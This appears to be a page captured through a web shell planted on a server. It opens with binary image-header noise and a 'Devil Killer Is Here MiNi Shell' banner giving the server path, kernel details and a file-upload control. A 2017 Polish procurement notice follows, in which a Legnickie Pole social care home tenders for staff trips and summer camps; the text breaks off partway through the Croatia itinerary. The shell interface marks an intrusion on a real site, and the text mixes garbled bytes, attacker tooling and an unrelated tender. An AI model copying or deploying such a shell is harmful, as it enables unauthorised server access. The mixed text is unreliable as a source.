JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170321/47606-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 47606 - 2017
              z dnia 2017-03-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Legnickie Pole: Organizacja wypoczynku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej w Legnickim Polu, krajowy numer identyfikacyjny
              , ul.
              ul. Benedyktynów 
              4,
              59241  
              Legnickie Pole, woj.
              dolnośląskie, państwo
              Polska, tel.
              76  858-23-87 w. 140, e-mail
              sekretariat@dpslp.org.pl, faks
              .
              <br />
              Adres strony internetowej (URL): http://www.dpslp.nbip.pl/dpslp/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.dpslp.nbip.pl/dpslp/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wnioski o dopuszczenie do udziału w licytacji elektronicznej należy składać wyłącznie  w formie pisemnej: 1) za pośrednictwem operatora pocztowego, 2)osobiście lub przez posłańca<br />
                Adres:
                <br />Sekretariat, Dom Pomocy Społecznej w Legnickim Polu, ul. Benedyktynów 4, 59-241 Legnickie Pole, w godz.: 7.00-15.00.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Organizacja wypoczynku<br /><b>Numer referencyjny: </b>GŻ/230-2-3/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest: usługa organizacji wypoczynku dla pracowników Domu Pomocy Społecznej w Legnickim Polu i ich rodzin w 2017. Na zadanie składa się: 
a)zorganizowanie 3-dniowej wycieczki autokarowej objazdowej do Baranowa Sandomierskiego, Sandomierza, Opatowa, Kazimierza Dolnego i Zwolenia w terminie 8-10.09.2017 dla  130 osób.
1. Przewidywana liczba uczestników: 130-oznacza maksymalną liczbę uczestników. Podana przez Zamawiającego liczba jest liczbą  przewidywaną. Rzeczywista liczba zgłoszeń, wynikająca z aktualnych potrzeb Zamawiającego, zostanie podana Wykonawcy na 21  dni przed planowanym wyjazdem.
2. Miejsce wypoczynku: Baranów Sandomierski, Sandomierz, Opatów, Kazimierz Dolny i Zwoleń.
3. Termin wypoczynku: 8-10.09.2017 r.
czas trwania: 3 dni
4. Z uwagi na fakt, iż Zamawiający planuje wycieczkę dla 3 grup w tym terminie, program wycieczki dla każdej z grup będzie różny.
a)Program wycieczki-Grupa I:
Dzień 1
Godz. 6:00 Wyjazd z Legnicy
Godz. 15:00 Przyjazd do Baranowa Sandomierskiego  Zwiedzanie Zespoły Pałacowo  Parkowego:
Trasa Zwiedzania:
 Przejście przez Park
 Arkadowy Dziedziniec Zamku
 Secesyjna Kaplica Zamkowa
 Wnętrza historyczne I piętra
Następnie przejazd przez Pacanów - wizyta w rynku u sympatycznego Koziołka
Godz. 16:30 Przejazd do Hotelu/Pensjonatu w Ostrowcu Świętokrzyskim
Godz. 18:00 Obiadokolacja i nocleg
Dzień 2
Godz. 8:00 Śniadanie
Godz. 9:00 wyjazd do Opatowa
Przyjazd do Opatowa zwiedzanie: Brama Warszawska, Klasztor ojców Bernardynów, Kolegiata św. Marcina. Możliwość zakupu jedynych oryginalnych "Krówek Opatówek"
Godz. 11:00 Przejazd do Ujazdu - Zwiedzanie "Polskiego Koloseum" - zamek Krzyż - Topór Ossolińskich.
Godz. 12:30 przejazd do Sandomierza
Godz. 13:30 Zwiedzanie miasta  Góry pieprzowe, Katedra, Rynek Starego Miasta, ul. Basztowa, Podziemna trasa turystyczna, Ucho Igielne, Dworek Ojca Mateusza, rejs statkiem po Wiśle, następnie czas wolny w Sandomierzu 
Godz. 17:30przejazd do jednej ze słynnych sandomierskich winnic 
Godz. 18:00 - degustacja regionalnego wina i serów.
następnie powrót do hotelu
Godz. 20:30  Obiadokolacja i nocleg.
Dzień 3
Godz. 7:00 Śniadanie
Godz. 8:00 Wyjazd do Kazimierza Dolnego
Godz. 10:00 Zwiedzanie miasta  przejście od starej zbrojowni, pomnik psa Werniksa, Rynek Starego Miasta  kamienice pod św. Mikołajem i św. Krzysztofem, kamienica Celejowska, jatki koszerne, Kościół św. Anny.
Przejście do zamku kazimierzowskiego i na basztę, dla pozostałych osób czas wolny.
Godz. 13:00 Przejazd do Zwolenia.
Godz. 14:30 Zwiedzanie Kościoła Podwyższenia Krzyża Świętego  miejsce pochówku Jana Kochanowskiego.
Godz. 16:00 Wyjazd w drogę powrotną do Legnicy
Przyjazd do Legnicy ok. godz. 1:00 w nocy.

b) Program wycieczki-Grupa II:
Dzień 1
Godz. 5:00 Wyjazd z Legnicy
Godz. 13:00 Przyjazd do Zwolenia. Zwiedzanie Kościoła Podwyższenia Krzyża Świętego  miejsce pochówku Jana Kochanowskiego
Godz. 14:00 Przejazd do Kazimierza Dolnego
Godz. 15:00 Zwiedzanie miasta  przejście od starej zbrojowni, pomnik psa Werniksa, Rynek Starego Miasta  kamienice pod św. Mikołajem i św. Krzysztofem, kamienica Celejowska, jatki koszerne, Kościół św. Anny.
Następnie dla osób chętnych (trasa wymagająca stroma wstępy płatne we własnym zakresie) Przejście do zamku kazimierzowskiego i na basztę, dla pozostałych osób czas wolny.
Godz. 18:00 Przejazd do Ostrowca Świętokrzyskiego
Godz. 19:00 Obiadokolacja i nocleg
Dzień 2
Godz. 8:00 Śniadanie
Godz. 9:00 wyjazd do Ujazdu
Godz. 10:00 Przejazd do Ujazdu - Zwiedzanie "Polskiego Koloseum" - zamek Krzyż - Topór Ossolińskich
11:30 Przejazd do Opatowa
Godz. 12:00 Przyjazd do Opatowa zwiedzanie: Brama Warszawska, Klasztor ojców Bernardynów, Kolegiata św. Marcina. 
Godz. 13:00 przejazd do Sandomierza
Godz. 14:00 Zwiedzanie miasta  Góry pieprzowe, Katedra, Rynek Starego Miasta, ul. Basztowa, Podziemna trasa turystyczna, Ucho Igielne, Dworek Ojca Mateusza, rejs statkiem po Wiśle, następnie czas wolny w Sandomierzu - przejazd do jednej ze słynnych sandomierskich winnic - degustacja regionalnego wina i serów 
następnie powrót do hotelu
Godz. 18:00 Degustacja win i serów, następnie przejazd do hotelu
Godz. 20:30  Obiadokolacja i nocleg.
Dzień 3
Godz. 8:00 Śniadanie
Godz. 9:00 Wyjazd w kierunku Pacanowa
Godz. 10:30 Przyjazd do Pacanowa - wizyta w rynku u sympatycznego Koziołka
Przejazd do Baranowa Sandomierskiego
11:30 Przyjazd do Baranowa Sandomierskiego  Zwiedzanie Zespoły Pałacowo  Parkowego:
Trasa Zwiedzania:
 Przejście przez Park
 Arkadowy Dziedziniec Zamku
 Secesyjna Kaplica Zamkowa
 Wnętrza historyczne I piętra
Godz. 14:00 Wyjazd w drogę powrotną do Legnicy
Przyjazd do Legnicy ok. godz. 23:00 .

c) Program wycieczki-Grupa III:
Dzień 1
Godz. 5:00 Wyjazd z Legnicy
Godz. 14:00 Przyjazd do Baranowa Sandomierskiego  Zwiedzanie Zespoły Pałacowo  Parkowego:
Trasa Zwiedzania:
 Przejście przez Park
 Arkadowy Dziedziniec Zamku
 Secesyjna Kaplica Zamkowa
 Wnętrza historyczne I piętra
Następnie przejazd przez Pacanów - wizyta w rynku u sympatycznego Koziołka
Godz. 15:30 Przejazd do Hotelu/Pensjonatu w Ostrowcu Świętokrzyskim
Godz. 18:00 Obiadokolacja i nocleg
Dzień 2
Godz. 7:30 Śniadanie
Godz.8:30 wyjazd do Sandomierza
Godz. 11:00 Przyjazd do Sandomierza. Zwiedzanie miasta  Góry pieprzowe, Katedra, Rynek Starego Miasta, ul. Basztowa, Podziemna trasa turystyczna, Ucho Igielne, Dworek Ojca Mateusza, rejs statkiem po Wiśle, następnie czas wolny.
Godz. 15:00 Wyjazd do winnicy Sandomierskiej
Godz. 15:30 Degustacja win i serów
Godz. 16:30 Przejazd do Opatowa
Przyjazd do Opatowa zwiedzanie: Brama Warszawska, Klasztor ojców Bernardynów, Kolegiata św. Marcina. Możliwość zakupu jedynych oryginalnych "Krówek Opatówek"
Godz. 19:00 Przejazd do Ujazdu - Zwiedzanie "Polskiego Koloseum" - zamek Krzyż - Topór Ossolińskich.
Godz. 20:30 Przejazd do hotelu
Godz. 21:30 Obiadokolacja i nocleg.
Dzień 3
Godz. 7:00 Śniadanie
Godz. 8:00 Wyjazd do Zwolenia
Godz. 10:00 Przejazd do Zwolenia. Zwiedzanie Kościoła Podwyższenia Krzyża Świętego  miejsce pochówku Jana Kochanowskiego.
Godz. 11:30 Wyjazd do Kazimierza Dolnego
Godz. 12:30 Zwiedzanie miasta  przejście od starej zbrojowni, pomnik psa Werniksa, Rynek Starego Miasta  kamienice pod św. Mikołajem i św. Krzysztofem, kamienica Celejowska, jatki koszerne, Kościół św. Anny.
Następnie dla osób chętnych (trasa wymagająca stroma wstępy płatne we własnym zakresie) Przejście do zamku kazimierzowskiego i na basztę, dla pozostałych osób czas wolny.
15:30 Zakończenie zwiedzania
Godz. 16:00 Wyjazd w drogę powrotną do Legnicy
Przyjazd do Legnicy ok. godz. 2:00 w nocy.
5.Wyżywienie: Wykonawca zapewni 2 x śniadanie, 2 x obiadokolacja.
6. Wykonawca zapewni uczestnikom: bilety występów do zwiedzanych obiektów: Pałac w Baranowie Sandomierskim, Kolegiata św. Marcina w Opatowie, Kościoła Podwyższenia Krzyża Świętego w Zwoleniu, Zamek Krzyż - Topór, Podziemna trasa turystyczna w Sandomierzu, rejs statkiem po Wiśle, Góry Pieprzowe, degustację win i serów na terenie winnicy.
7. Opieka: organizator wypoczynku jest zobowiązany do zapewnienia kompetentnego pilota-przewodnika wycieczek.
8. Transport uczestników wypoczynku powinien zostać zorganizowany z uwzględnieniem wymagań określonych w 
ustawie z dnia 6 września 2001 roku o transporcie drogowym (tekst  jednolity Dz.U. 2016 poz. 1907).
a) wyjazd na wycieczkę oraz powrót nastąpią  o godzinach  wskazanych w programach w zależności od grupy.
b) Wykonawca zapewni uczestnikom wycieczki  transport komfortowym, klimatyzowanym  autokarem (nie starszym niż 5 lat) , wyposażonym w toaletę i odtwarzacz DVD. 
c)Wykonawca zapewni ubezpieczenie autokaru;
d) w przypadku awarii autokaru podstawienie autokaru zastępczego nastąpi na koszt Wykonawcy.
9. Ubezpieczenie: Wykonawca zapewni uczestnikom  wypoczynku ubezpieczenie od następstw nieszczęśliwych wypadków zarówno na czas pobytu, jak i czas podróży. Ubezpieczenie obejmuje okres momentu rozpoczęcia wycieczki do momentu przyjazdu z wycieczki do Legnicy.
10.Zakwaterowanie: Wykonawca zapewni 2 noclegi - zakwaterowanie w Hotelu/Pensjonacie w pokojach z 2/3 os. z łazienkami.

b) zorganizowanie kolonii/obozu w  Pogorzelicy w dniach 24.06-07.07.2017 r. dla 20 osób.

1. Przewidywana liczba uczestników: 20 oznacza maksymalna liczbę uczestników. Podana przez Zamawiającego liczba jest liczbą  przewidywaną. Rzeczywista liczba skierowań, wynikająca z aktualnych potrzeb Zamawiającego, zostanie podana Wykonawcy na 14 dni przed planowanym wyjazdem.
2. Miejsce wypoczynku/zwiedzania: Pogorzelica i okolice.
3. Termin wypoczynku: 24.06-07.07.2017 r.
Liczba turnusów: 1, czas trwania: 14 dni. Ilość: 13 noclegów.
4.Zakwaterowanie: 
a) Zamawiający nie dopuszcza, aby zakwaterowanie odbywało się w obiekcie używanym okazjonalnie do wypoczynku (np. szkoły, remizy, domy parafialne itp.). Akceptowane będą obiekty hotelowe lub inne obiekty, w których są świadczone usługi hotelarskie. Wymogi jakim muszą odpowiadać obiekty reguluje  rozporządzenie Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (tekst jednolity Dz. U. 2006 nr 22 poz.169 z późn. zm)
b) Zamawiający zastrzega jednak, że nie dopuszcza zakwaterowania w domkach kempingowych i namiotach.
c) Minimalne wymogi w zakresie budynków, w których będą zakwaterowani uczestnicy kolonii:
-obiekt  murowany z zapleczem sanitarnym i sportowym, ogrodzony.
- zakwaterowanie wszystkich uczestników w jednym budynku;
- obiekt powinien być wyposażony w salę TV, salę wypoczynkową, salę gimnastyczną oraz plac zabaw i rekreacji.
- obiekt z własna kuchnia i stołówką.
- obiekt powinien znajdować się maksymalnie 600  m od morza;
- teren powinien być strzeżony 24 h na dobę.
d) Pokoje dla uczestników powinny spełniać wymogi:
- pokoje  max.4-5 osobowe z pełnym węzłem sanitarnym wyposażone w natryski i wc, ciepłą wodę dostępną bez ograniczeń,
- nie dopuszcza się łóżek piętrowych.
e) na terenie ośrodka internet Wi-Fi
5.Wyżywienie: 
a) Zamawiający wymaga zapewnienia wyżywienia w ośrodku w postaci: 4 posiłków dziennie: śniadanie, obiad, podwieczorek  i kolacja. Napoje dostępne 24h/dobę.
b) pierwszym posiłkiem w ośrodku będzie obiado-kolacja w dniu przyjazdu, ostatnim posiłkiem jest śniadanie w dniu wyjazdu.
c) na drogę powrotną uczestnicy otrzymają suchy prowiant (w tym napoje).
d) posiłki powinny być urozmaicone i odpowiadać normom żywienia opracowanym przez Instytut Żywności i Żywienia  zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, a także bogate w witaminy, owoce i warzywa.
6.Wymogi odnośnie programu kolonii/obozu:
-zabawy na sprzęcie  do gier świetlicowych i terenowych
-korzystanie z infrastruktury ośrodka
-organizowanie dyskotek
-neptunalia, spartakiada kolonijna i konkursy z nagrodami
-wycieczka do Wolińskiego Parku narodowego i rezerwatu Żubrów
-gra integracyjna-tematyczna gra terenowa militarna (manewry, strzelanie ASG, paintball, techniki linowe, wykorzystywanie elektronicznych wykrywaczy metalu, zabawy ruchowe, przejazd pojazdem wojskowym)
-wycieczka do Trzęsacza kolejką wąskotorową
-2 ogniska z pieczeniem kiełbasek
-pamiątka dla każdego uczestnika
7.Opieka: 
a) organizator wypoczynku jest zobowiązany do zapewnienia właściwej opieki uczestnikom wypoczynku, w szczególności: całodobowej opieki doświadczonej kadry zgodnie z przepisami MEN;
b) dostęp do całodobowej opieki pielęgniarskiej;
c) opieka wychowawcy i  ratownika (wychowawca i ratownik z uprawnieniami i doświadczeniem)
d) pokoje wychowawców i dzieci muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników kolonii na sąsiadujących kondygnacjach na każdej z nich musi znajdować się pokój wychowawców.
8. Transport uczestników wypoczynku powinien zostać zorganizowany z uwzględnieniem wymagań określonych w ustawie z dnia 6 września 2001 roku o transporcie drogowym (tekst jednolity Dz.U. 2016 poz. 1907),
a) wyjazd na kolonię  nastąpi 24.06.2017  r. z Legnicy,  powrót 07.07.2017 r. do Legnicy.
b)Wykonawca zapewni uczestnikom kolonii/obozu transport komfortowym, autokarem z nawiewem  (nie starszym niż 5 lat), wyposażonym w toaletę, barek i odtwarzacz DVD. 
c) Wykonawca zapewni opiekę doświadczonej kadry nad dziećmi w czasie przejazdu, zgodnie  przepisami MEN,
e) ubezpieczenie autokaru,
f) w przypadku awarii autokaru podstawienie autokaru zastępczego nastąpi na koszt Wykonawcy.
 9. Ubezpieczenie: uczestnicy wypoczynku muszą mieć zapewnione ubezpieczenie od następstw nieszczęśliwych wypadków i kosztów leczenia zarówno na czas pobytu, jak i czas podróży. Ubezpieczenie obejmuje okres momentu przekazania dzieci pod opiekę wychowawców w miejscu zbiórki do momentu odebrania dzieci przez opiekunów/rodziców po powrocie z wypoczynku. 
10. Dodatkowe wymagania:
Wykonawca zapewni bilety wstępów do zwiedzanych  obiektów, opłaty za przewozy i przewodników oraz opłaty klimatyczne. 

c) zorganizowanie kolonii/obozu w Chorwacji w dniach 08.07-18.07.2017 r. dla 30 osób.
1. Przewidywana liczba uczestników: 30 oznacza maksymalna liczbę uczestników. Podana przez Zamawiającego liczba jest liczbą  przewidywaną. Rzeczywista liczba skierowań, wynikająca z aktualnych potrzeb Zamawiającego, zostanie podana Wykonawcy na 14 dni przed planowanym wyjazdem.
2. Miejsce wypoczynku/zwiedzania: Split, Vela Luka, Korcula, Mostar , Sarajewo. 
3. Termin wypoczynku: 08.07-18.07.2017 r.
Liczba turnusów: 1, czas trwania: 11 dni. Ilość: 8 noclegów.
4.Zakwaterowanie: 
a) Zamawiający nie dopuszcza, aby zakwaterowanie odbywało się w obiekcie używanym okazjonalnie do wypoczynku (np. szkoły, remizy, domy parafialne itp.). Akceptowane będą obiekty hotelowe lub inne obiekty, w których są świadczone usługi hotelarskie. Wymogi jakim muszą odpowiadać obiekty reguluje rozporządzenie Ministra Gospodarki i Pracy z 19.08. 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są  świadczone usługi hotelarskie ( Dz.U. z 2006 r. Nr 22, poz.169).  
b) Zamawiający zastrzega jednak, że nie dopuszcza zakwaterowania w domkach kempingowych i namiotach.
c) Minimalne wymogi w zakresie budynków, w których będą zakwaterowani uczestnicy obozu:
- hotel o standardzie min. 3*w miejscowości Vela Luka
- zakwaterowanie wszystkich uczestników w jednym budynku;
- obiekt powinien być wyposażony w salę TV, salę wypoczynkową.
- restauracja na terenie budynku;
- obiekt powinien znajdować się maksymalnie do 100  m od morza;
- teren powinien być strzeżony 24 h na dobę.
d) Pokoje dla uczestników powinny spełniać wymogi:
- pokoje klimatyzowane  max.3-4 osobowe z pełnym węzłem sanitarnym wyposażone w natryski i wc, ciepłą wodę dostępną bez ograniczeń,
- nie dopuszcza się łóżek piętrowych.
e) podczas noclegów tranzytowych Zamawiający dopuszcza noclegi w hostelach lub hotelach 2 lub 3 *.
5.Wyżywienie: 
a) Zamawiający wymaga zapewnienia wyżywienia   w hotelu w miejscowości Vela Luka 3 posiłków dziennie: śniadanie, obiad, i kolacja. Napoje dostępne 24h/dobę.
b) pierwszym posiłkiem w hotelu będzie obiadokolacja  w dniu przyjazdu, ostatnim posiłkiem jest śniadanie w dniu wyjazdu.
c) na drogę powrotną uczestnicy otrzymają suchy prowiant (w tym napoje).
d) posiłki powinny być urozmaicone i odpowiadać normom żywienia opracowanym przez Instytut Żywności i Żywienia  zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, a także bogate w witaminy, owoce i warzywa.
6.Program kolonii/obozu:
Dzień 1:  Wyjazd z Legnicy. Nocny przejazd  przez Czechy, Austrię do Chorwacji.
Dzień 2: Śniadanie w formie suchego prowiantu. Przyjazd do Splitu i zwiedzanie miasta: spacer Deptakiem Riva wzdłuż murów Pałacu Dioklecjana, katedra św. Dujama, wejście na Górę Marjan - punkt widokowy miasta. Wypoczynek na plaży, przeprawa promowa na wyspę Korcula. Następnie przejazd do miejscowości Vela Luka. Zakwaterowanie, obiadokolacja, nocleg.
Dzień 3-8: Wypoczynek i realizacja programu:
- wycieczka do miasta Korcula śladami podróżnika i odkrywcy. Zwiedzanie stolicy wyspy, między innymi potężne mury miejskie z basztami obronnymi, dom urodzenia Marco Polo, katedra św. Marka, pałac biskupi (z zewnątrz).
